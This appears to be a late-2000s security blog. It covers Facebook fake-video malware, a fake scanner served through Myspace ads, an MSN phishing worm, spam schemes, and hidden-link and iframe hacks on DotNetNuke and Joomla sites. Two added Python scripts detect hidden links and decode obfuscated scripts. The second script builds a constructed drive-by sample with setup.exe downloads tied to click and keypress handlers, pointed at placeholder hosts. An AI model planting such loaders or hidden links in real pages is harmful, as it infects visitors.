Facebook disables wrong account

October 23rd, 2009

temporarily disabled FB account

Yesterday and today I’ve been busy mopping up the aftermath of two people on my friends list spreading the fake videos on Facebook.

One of these friends had over 1400 friends. The hacker used her account to send fake videos by FB mail to friends of her friends (I received nothing).

When another of my friends started sending out massive amounts of infected FB mails and posted fake videos to our walls, the shit hit the fan.

Somebody in their wisdom discerned that the other friend was the hacker, and there was a lynch mob forming. I realized what was happening, and rebuked them. I also contacted the woman in question. Poor thing was terrified, because people had been posting stuff on her wall all day.

So as you can imagine, I was one busy bee, posting about this, warning people etc.

Then Facebook disables my account, but leaves the infected ones alone!!!!!

I have more than one computer, and more than one IP number (different providers). That combined with the fact that I warned people about the fake videos, and was very active today, tripped something at Facebook.

I’m pretty pissed off, understandably.

Anyway - for advanced users out there - don’t have more than one computer logged in to Facebook at the same time, on different net providers. It could SOOO easily happen to more than just me. THAT’s what triggers getting suspended, not actually being infected!

Fake malware scan on Myspace ad

October 19th, 2009

I just accessed a Myspace profile, and after a second or so, a fake malware scan started. The scan was launched from mednetsafety.com. When looking in my history, I see the page was titled SoftCop - Online Protection. This thing eventually tries to drop a setup.exe file.

Scary.. And the scariest was that this was launched from Myspace, so they’ve gotten a bad guy into their ad network.

I don’t see any info about that site and malware, so this might be rather new.

Question is, was the site hacked, or was it set up by bad guys?

Hmm, registered by someone in London - apparently a non-existent address, with a non-British sounding name, and the registrar is nic.ru. The domain was just registered a few days ago.

In the page loaded, there’s a reference to typesords.com, owned by the same person a few days ago.

Good enough for me, this looks like a bad guy, though probably not a real name:

Contact Name:            Johnny Dakaskas
Contact Organization:    Johnny Dakaskas
Contact Street1:         Sunstayn’s Rd 11
Contact City:            London
Contact State:           London
Contact Postal Code:     31032
Contact Country:         GB
Contact Phone:           +44 118 95034543
Contact Fax:             +44 118 95034543
Contact E-mail:          johnny.dakaskas@gmail.com

According to MalwareURL, Johnny Dakaskas has a group of domains, and most of them are dropping FakeSmoke Trojan.

Facebook and fake video

October 16th, 2009

First I noticed a friend had added a video to my wall. It didn’t look like his usual stuff - being Scandinavian, he rarely posts in English, and he wouldn’t use slang. So I thought, hmmm…

fake video on facebook

Of course, I should have noticed that there was no play button on there, but that could have been faked too, so that’s no guarantee!

Next I notice this status update on his profile:

Got a video in my inbox called “Woww! Is thaat reallyy you in that viideo?” Do not click on it. It is a computer virus. And it does not come from me.

I told him immediately that he could track where that “video” had been posted by following the small links on his profile, and he could remove them from other people’s profiles, since “he” had posted them. I suggest others do that as well, if it happens to you!

Then I check the code on the page. There’s a script that’s too convoluted for me to bother figuring out (and my antivirus blocks the page as dangerous anyway), but I did note this:

list of social networking sites in script

I do however notice a list of IP numbers in the next table, just slightly obfuscated. One of those gives me (in a text browser) a page that includes the words:  Video | Facebook. And there’s also a file: setup.exe which is loaded on document.onclick and document.onkeydown

I also notice an address that seems to be loaded when you leave the page, going to an affiliate id 02979 at mexcleaner.in. That page includes this sentence:

Your computer is stongly infected by viruses! ‘ It can cause data loss and file damages and need to be cured as soon as possible

It then gives a bogus list of infections, along with a solution:

Affiliate ID 02979 at downloadmasters.org

A report on Siteadvisor from two days ago implicates that site as redirecting to a Trojan.

———-

Update: Messages similar to the ones used with these fake videos have been known for a while on Twitter, and back then it was the Koobface trojan that was pushed. Here’s what Kee Heritage has to say about this.

A friend who got stung by this said she never clicked on any fake video, so she doesn’t understand how she got it. She has Panda antivirus on her computer, and the scan came up empty. TrendMicro however tends to block most of the pages used in this attack.

Update October 30:

From what I’ve seen of the fake videos, this TrendMicro writeup about Koobface looks very familiar - the addresses last used were blogspot addresses.

————

Sorry I’ve been incommunicado for so long. I figured I’d shift this blog over to the stuff I’m blogging about here, and so far this was the first thing that really got me going enough to divert from all the other stuff I’m doing. Sorry..

MSN worm making rounds?

April 19th, 2009

I’ve had three messages from friends on MSN the last two days that weren’t actually from them. They were all Norwegian nationals, and were unlikely to write to me in English. And they certainly were unlikely to “cold call” links to dodgy sites.

Most likely there’s a form of MSN worm making the rounds in Norway right now.

Hmmm, combination worm/phish, it appears…

I checked the latest URL with a text browser, and there was a redirect to a page with the title:
MSN anti-Block Checker is now FREE!

The page then says:
Your Contact List is Searcing now…
Please Wait!

And then an alert:
Congratulations! Your MSN Contact List is clear! Nobody has blocked you

I also found this:
Please fill MSN Account and Password fields

UPDATE:
Oh dear (as Miss Marple would say, she was just on TV).

Another link I received led to a 302 redirect and then to an exe file. I’ve got it saved on a unix server, if anyone’s interested in examining it.

The third link went to a spammy page on weightloss pills.

Facebook viral group spam

March 10th, 2009

Spammers appear to have set their sights on Facebook for spamming purposes. But since outgoing links have rel nofollow, it’s no good for Googlejuice. So let’s examine an actual example of a group set up for spam purposes:

http://www.facebook.com/group.php?gid=56828903531

It’s a group touting something called ProfileLock. Problem is, there’s no such thing. It’s just a clever second attempt at hawking wares (in this case, it’s a SEO firm).

The website associated with the group is called GoogleMarketing101.com. Normally variations on Google are not owned by Google, so I checked. The address was in Florida, in an area where spammers abound. I checked the name, the address and the domain name. The owner has talked about Facebook and SEO before. And he’s also made a Facebook group before, only it didn’t do so well: http://www.facebook.com/pages/Google-Marketing-101/46023747363

So what does he do? He capitalizes on the paranoia of people who have lost their profiles before due to some infraction or other. And the guy who sent the invitation to me DID lose his profile once. THAT’s where viral comes into the picture. People are gullible, and join because they have a need. What they don’t realize is that this is just a ploy to get people to click on the link, which is what it’s actually about.

This particular group promises that if you post the name on your Facebook profile along with your ID number, you will lock it in. It’s a scam. That group is very likely to disappear. You’re better off saving that data on your computer somewhere.

I’m sure Joel wouldn’t consider himself a spammer. After all, he doesn’t send out invitations to this group himself, he tricks his friends into doing it. Yes, I have a friend in common with this guy. So I’m not so much saying he’s a spammer as I’m saying this group is a scam, and I’m lumping the attempt in with other stuff I see on the web that I consider “spammy”.

Dot Net Nuke hacking

March 3rd, 2009

These are the hackings least likely to be spotted that I’ve ever seen.

Andrew Jensen commented on a post, leaving this case story of a Dot Net Nuke hacking.

I checked into some sites that had been hacked, and here’s what I found (and do read his post first):

On one site, the hacked links were inserted into the links at the very top, a div class named headerlinks. The hacked links were placed
top: -1500px; position: absolute
and
z-index: -2; position: absolute

On another site the links were placed prior to the main column.

It seems these links may be individually or randomly placed on the page. And the position (outside the browser window) also appears to be random.

I also found one hacked link that was placed differently:
position: absolute; left: 0px; bottom: 0px; font-size: 0.5em

That same site appeared to have a second, earlier hacking right above, with this code:
div style="display: none"

One site seemed to proudly display the links, as Sponsors, while another touted the site in a blog post. A third had a small text link under the Google Ad block.
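As an added example (not the blog author’s code, and nothing to do with DotNetNuke itself), here is a Python script that pulls the links out of a saved page and flags the ones hidden with the inline-CSS tricks listed above: off-screen absolute positioning, a negative z-index, display: none, and tiny text. The sample HTML is constructed to mirror the placements described, the .example hostnames are placeholders, and the “off-screen” and “tiny text” thresholds are assumptions.

```python
"""Flag links hidden with inline CSS, the trick used on the hacked DNN sites.

Added example (not the blog author's or DotNetNuke's code). The thresholds
for "off-screen" and "tiny" are assumptions; the sample HTML is constructed
and uses placeholder .example domains.
"""
import re
from html.parser import HTMLParser

# Elements that never get a closing tag; they must not push onto the stack.
VOID_TAGS = {"br", "img", "hr", "input", "meta", "link", "area", "base", "col"}

OFFSCREEN_PX = 500          # assumption: a negative offset this large is off-screen
TINY_EM, TINY_PX = 0.6, 4   # assumption: text this small is effectively hidden


def parse_style(style):
    """Turn 'a: b; c: d' into a dict of lower-cased property -> value."""
    props = {}
    for decl in style.split(";"):
        if ":" in decl:
            key, value = decl.split(":", 1)
            props[key.strip().lower()] = value.strip().lower()
    return props


def hiding_reason(style):
    """Return why this inline style hides its content, or None if it doesn't."""
    p = parse_style(style)
    if p.get("display") == "none":
        return "display:none"
    if p.get("visibility") == "hidden":
        return "visibility:hidden"
    positioned = p.get("position") in ("absolute", "fixed")
    for side in ("top", "left"):
        m = re.match(r"-(\d+)px", p.get(side, ""))
        if positioned and m and int(m.group(1)) >= OFFSCREEN_PX:
            return "offscreen %s:%s" % (side, p[side])
    if positioned and re.match(r"-\d+", p.get("z-index", "")):
        return "negative z-index"
    m = re.match(r"([\d.]+)\s*(px|em|pt)?", p.get("font-size", ""))
    if m:
        size, unit = float(m.group(1)), m.group(2)
        if size == 0 or (unit == "em" and size < TINY_EM) or (unit in ("px", "pt") and size < TINY_PX):
            return "tiny font-size:%s" % p["font-size"]
    return None


class HiddenLinkFinder(HTMLParser):
    """Collects (href, link text, reason) for anchors inside hidden elements."""

    def __init__(self):
        super().__init__()
        self.stack = []      # one hiding reason (or None) per open element
        self.found = []
        self._href = None
        self._reason = None
        self._text = []

    def _inherited(self):
        # A link is hidden if any enclosing element is hidden.
        for reason in reversed(self.stack):
            if reason:
                return reason
        return None

    def handle_starttag(self, tag, attrs):
        attrs = dict(attrs)
        own = hiding_reason(attrs.get("style") or "")
        if tag == "a" and attrs.get("href"):
            self._href = attrs["href"]
            self._reason = own or self._inherited()
            self._text = []
        if tag not in VOID_TAGS:
            self.stack.append(own)

    def handle_data(self, data):
        if self._href is not None:
            self._text.append(data)

    def handle_endtag(self, tag):
        if tag == "a" and self._href is not None:
            if self._reason:
                self.found.append((self._href, "".join(self._text).strip(), self._reason))
            self._href = None
        if tag not in VOID_TAGS and self.stack:
            self.stack.pop()


def find_hidden_links(html):
    """Return [(href, text, reason)] for every link hidden by inline CSS."""
    parser = HiddenLinkFinder()
    parser.feed(html)
    parser.close()
    return parser.found


# Constructed sample mirroring the placements described in the post.
SAMPLE_HTML = """
<div class="headerlinks" style="top: -1500px; position: absolute">
  <a href="http://mp3dir.example/">mp3 files directory</a>
</div>
<div style="z-index: -2; position: absolute"><a href="http://movies.example/">movie library</a></div>
<p>Welcome to our <a href="/about">company</a> site.<br></p>
<a href="http://pills.example/" style="position: absolute; left: 0px; bottom: 0px; font-size: 0.5em">cheap pills</a>
<div style="display: none"><a href="http://seo.example/">seo services</a></div>
"""

if __name__ == "__main__":
    for href, text, reason in find_hidden_links(SAMPLE_HTML):
        print("%-28s %-20s %s" % (href, text, reason))
```

Feed it the raw HTML of a saved page (for example the output of curl -s) rather than what a browser shows you, since the whole point of these links is that they never render. It only looks at inline style attributes; links hidden through an external stylesheet or by JavaScript after load need the rules resolved first.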

Here are the links I found apparently hacked into Dot Net Nuke installations. They may not all have been inserted by the same hacker:

filespie.com
movie2b.com
qarea.com
gigsofmp3.com
zmovielibrary.com
allgenresmusic.com
mp3filesdirectory.com

Update: qarea.com is affiliated with bughuntress.com, which has no shady links. We of course don’t know if they’ve paid for the hacking, or if someone included their site anyway.

Hacked Joomla site

February 26th, 2009

I came across a hacked site today. Turns out it was based on an older version of Joomla. That MIGHT be where the hackers got in, but not necessarily. I checked on that site a few weeks ago (there’s actually still a Google cache from back then, Jan 20, 2009), and back then I first thought something was wrong with the software, and then eventually found that the database server was down. I hadn’t been back until today.

(name of site removed) is a website belonging to a guy who writes books and articles on stalking, cyberstalking, bullying and online security. These days I don’t normally include the name of the sites that have been hacked, but this time I couldn’t resist. The security guy got hacked (OK, he says he’s not a security guy, I just thought it sounded good…). I’m sure this will be fodder for a great new article from the security guy!

He’s got lots of pages visible in Google from when the site was operational (as late as February 22, 2009). But now all those pages redirect to the root page. If you check index.html, you get a normal 404 error page, but index.php is a hacked 404 error page, that contains the hacked code.

The code is an escaped string fed through unescape and then eval. Decoded, it’s an iframe pointing to a Russian site. I never got so far as to see what was there, because my anti-virus dislikes the code. The source code on the page complains that the template file can’t be found. These hacks quite often pull in the code dynamically from a different website, so the code you see when you access the website might not be what’s hidden in the hacked site (in other words, finding the hacked code isn’t easy - better remove everything and reupload from your computer). And the exploit itself (usually a file that will infect a visiting computer) might be on a third site.

Here’s an image containing (first part) the code I found on the page, prior to the unescaped string, and (last part) what that string decoded to.
cyberstalking.co.uk

This hack has been mentioned online as early as 2007, and a year ago, and it’s been mentioned as serving malware, but this site was recently hacked, as far as I know.  According to others who had that happen, the hack was done through php scripts uploaded by clients. I checked other domains currently on the same server, and they do not appear to be affected.
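Both this Joomla hack (an escaped string run through unescape and eval, hiding an iframe) and the Facebook fake-video script from October 16 (setup.exe hooked to document.onclick and document.onkeydown, plus a redirect to an affiliate page when you leave) can be pulled apart offline instead of in a browser. The Python below is an added example, not the blog author’s code: it mirrors JavaScript’s unescape(), peels the unescape() layers out of a script one at a time, and then reports the iframes, .exe URLs, event handlers and hosts it finds in the decoded text. The sample script is constructed here for the demo; the 192.0.2.x addresses and the cleaner.example host are placeholders, not the ones from the real pages.

```python
"""Peel unescape()/eval layers off a malicious script and list what they hide.

Added example, not the blog author's code. SAMPLE_SCRIPT is constructed
inline; the 192.0.2.x addresses (documentation range) and cleaner.example
are placeholders, not the hosts from the real attacks.
"""
import re
from urllib.parse import urlparse

# Matches unescape("...") / unescape('...') whether or not it sits inside eval().
UNESCAPE_RE = re.compile(r"unescape\s*\(\s*(['\"])(.*?)\1\s*\)", re.S)
IFRAME_RE = re.compile(r"<iframe[^>]*\bsrc\s*=\s*['\"]?([^'\"\s>]+)", re.I)
EXE_RE = re.compile(r"https?://[^\s'\"<>]+\.exe", re.I)
URL_RE = re.compile(r"https?://[^\s'\"<>)]+", re.I)
HANDLER_RE = re.compile(
    r"(document|window)\.(onclick|onkeydown|onmousedown|onunload|onbeforeunload)\s*=", re.I)


def js_unescape(s):
    """Mirror JavaScript unescape(): %uXXXX -> code point, %XX -> character."""
    def repl(m):
        if m.group(1):
            return chr(int(m.group(1), 16))
        return chr(int(m.group(2), 16))
    return re.sub(r"%u([0-9a-fA-F]{4})|%([0-9a-fA-F]{2})", repl, s)


def js_escape(s):
    """Crude escape() for ASCII text; only used here to build the sample."""
    return "".join("%%%02X" % ord(c) for c in s)


def decode_layers(script, max_depth=5):
    """Return every decoded unescape() payload, outermost first.

    Each decoded layer is searched again, so nested unescape() calls
    (eval(unescape(...)) wrapping document.write(unescape(...))) all come out.
    """
    layers, frontier = [], [script]
    for _ in range(max_depth):
        nxt = [js_unescape(m.group(2)) for chunk in frontier for m in UNESCAPE_RE.finditer(chunk)]
        if not nxt:
            break
        layers.extend(nxt)
        frontier = nxt
    return layers


def analyze(script):
    """Summarise the indicators found in the script and all its decoded layers."""
    layers = decode_layers(script)
    text = "\n".join([script] + layers)
    return {
        "layers": len(layers),
        "iframes": IFRAME_RE.findall(text),
        "exe_urls": sorted(set(EXE_RE.findall(text))),
        "handlers": sorted({h.lower() for _, h in HANDLER_RE.findall(text)}),
        "hosts": sorted({urlparse(u).hostname for u in URL_RE.findall(text)}),
    }


# --- constructed sample: two layers, like the pages described in the posts ---
INNER_HTML = '<iframe src="http://192.0.2.10/in.php" width="1" height="1"></iframe>'
STAGE1_JS = (
    'document.write(unescape("' + js_escape(INNER_HTML) + '"));'
    'document.onclick=function(){window.location="http://192.0.2.20/setup.exe"};'
    'document.onkeydown=document.onclick;'
    'window.onbeforeunload=function(){window.location="http://cleaner.example/?aff=00000"};'
)
SAMPLE_SCRIPT = 'eval(unescape("' + js_escape(STAGE1_JS) + '"))'

if __name__ == "__main__":
    for key, value in analyze(SAMPLE_SCRIPT).items():
        print("%-9s %s" % (key, value))
```

Run it on the page source fetched with a text browser or curl, never on a live browser session. It is a static decoder only: if the script builds its strings with arithmetic, String.fromCharCode, or a second fetch from another host (the case this post describes), you will see the loader but not the final payload, and the hosts list tells you where to look next.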

Here’s an analysis of who is behind this (Nov 2007)

MyDailyFlog sends deceptive invites

December 20th, 2008

There’s a guy in my “network” who keeps on joining one network after another. And he always sends me invitations. They go straight in the “half spam” bucket.

The latest invitation piqued my curiosity. It was from mydailyflog.com, and it said:

Hi!
I would like to invite you to visit MyDailyFlog and see my latest photos.

And then the link, which was in this format:

http://www.mydailyflog.com/go/invite_register/randomusername/somenumber

Hmm, this doesn’t look to me like the link to a post with his latest photos? Because if he was sending me an invitation to view his latest photos, I’d be inclined to go check them out. But invite_register? That sounds awfully like fanbox behavior. How do I know they won’t create a profile for me just from that link? I had to test it, but not with my own e-mail address - I don’t want to encourage them to keep spamming me, so I find a random invitation in Google (yes I know, it’s ethically questionable, but Google has followed a bunch of those already, so…).

And yes, they have the e-mail address filled out, and are just waiting for my password.

Oh, and he has no photos at all yet, so this wasn’t a specific invitation to me, which I wouldn’t mind - for specific photos he manually invited me to see, but an attempt to get me to sign up.

I also checked the Terms of Service, and they state among other things that:

…You are solely responsible for any use of or action taken under your password on the Site. Your password may be used only to post Posted Content, review information regarding potential and completed transactions and otherwise access and use the Site and Services in accordance with these Terms and Conditions…. …You accept full responsibility for all transactions and other activity placed or conducted through your account and agree to and hereby release MyDailyFlog from any and all liability concerning such transactions or activity….

There’s just one problem with that… The e-mail I received was not sent by my friend, but by the dailyflog system - which means he either expressly gave them my address, or gave them access to his address book, presumably by giving them his webmail password.

So… Dailyflog sends out invitations, and you’re responsible. Now, why does that sound familiar?

Update: Very funny, I now got an invitation with a link identical to the one I put into this blog post. Serves me right for including the number at the end, which was identical to the number on the first invitation I got. So it’s possible that the number identifies a specific e-mail address regardless of who the “inviter” is?

Hacked vacation responses

December 15th, 2008

I’ve sent out a few newsletters recently, and got one reply that raised my suspicions. It was a vacation reply that hawked a website, and it looked like spam. Although I don’t know the person who owns the e-mail address, I suspect she was hacked, and somebody turned on her vacation response and filled it with their spam.

hi:
Heya, how are you doing recently ? I would like to introduce you a very good company which I knew. Their company homepage is www.sugefa.com. They can offer you all kinds of electronical products which you need, such as motorcycles, laptops, mobile phones, digial cameras, TV LCD,xbox, ps3, gps, MP3/4, etc. Please take some time to have a look at it, there must be something you ‘d like to purchase.
Their contact email: sugefa@188.com.
MSN: sugefa@hotmail.com
TEL: +8610-80973507
Hope you have a good mood in shopping from their company!
Regards

I’ve found the same sentences on the net, on a blog that seems to use e-mail to post. The owner probably didn’t send some of those posts from September and October.

Here’s a report on this spammer/hacker.

If you see a vacation response like this, please notify the person it came from, maybe via Facebook or another address as well if you can. They’re usually so mortified that they got hacked that they might not reply to you, unfortunately. Getting hacked is no longer something to be ashamed of. There are so many ways they hack people, you’ll have to be VERY good with computers and very lucky to avoid ever being hacked.

More people talking about this phenomenon:

Computerhope
taint.org

Estdomains history

December 1st, 2008

Estdomains, home to lots of spam domains, is now history. Good riddance!